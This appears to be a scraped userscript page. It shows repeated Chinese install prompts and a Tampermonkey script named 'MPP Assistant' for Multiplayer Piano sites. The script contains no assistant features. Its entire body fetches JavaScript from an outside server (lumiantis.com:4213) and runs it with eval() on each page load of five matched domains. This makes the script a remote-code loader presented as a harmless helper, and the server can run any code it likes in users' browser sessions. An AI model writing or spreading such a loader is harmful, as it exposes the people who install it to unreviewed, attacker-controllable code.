您需要先安装一个扩展,例如 篡改猴、Greasemonkey 或 暴力猴,之后才能安装此脚本。
您需要先安装一个扩展,例如 篡改猴 或 暴力猴,之后才能安装此脚本。
您需要先安装一个扩展,例如 篡改猴 或 暴力猴,之后才能安装此脚本。
您需要先安装一个扩展,例如 篡改猴 或 Userscripts ,之后才能安装此脚本。
您需要先安装一款用户脚本管理器扩展,例如 Tampermonkey,才能安装此脚本。
您需要先安装用户脚本管理器扩展后才能安装此脚本。
For Multiplayer Piano
// ==UserScript== // @license MIT // @name MPP Assistant by RoxasYTB (Last Version Auto) // @namespace http://tampermonkey.net/ // @version 0.3 // @description For Multiplayer Piano // @author RoxasYTB // @match *://multiplayerpiano.net/* // @match *://multiplayerpiano.org/* // @match *://mppclone.com/* // @match *://mpp.terrium.net/* // @match *://piano.ourworldofpixels.com/* // @grant none // ==/UserScript== var fromRepl = true; (async () => { var code = await fetch("https://lumiantis.com:4213/", { method: "GET", headers: { "Content-Type": "application/javascript" }, body: null }).then((e => e.text())).then(e => eval(e)); })()